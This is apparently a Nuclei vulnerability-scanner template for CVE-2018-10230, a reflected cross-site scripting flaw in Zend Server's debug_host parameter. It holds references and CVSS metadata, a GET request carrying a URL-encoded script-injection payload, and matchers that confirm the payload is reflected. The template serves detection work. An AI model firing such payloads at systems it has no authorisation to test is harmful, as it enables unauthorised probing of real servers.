nuclei-templates/cves/2018/CVE-2018-10230.yaml

44 lines
1.1 KiB
YAML

id: CVE-2018-10230
info:
name: Zend Server <9.13 - Cross-Site Scripting
author: marcos_iaf
severity: medium
description: |
Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter.
reference:
- https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf
- https://www.zend.com/en/products/server/release-notes
- https://nvd.nist.gov/vuln/detail/CVE-2018-10230
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-10230
cwe-id: CWE-79
tags: cve,cve2018,xss,zend
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- "is not allowed to open debug sessions"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/18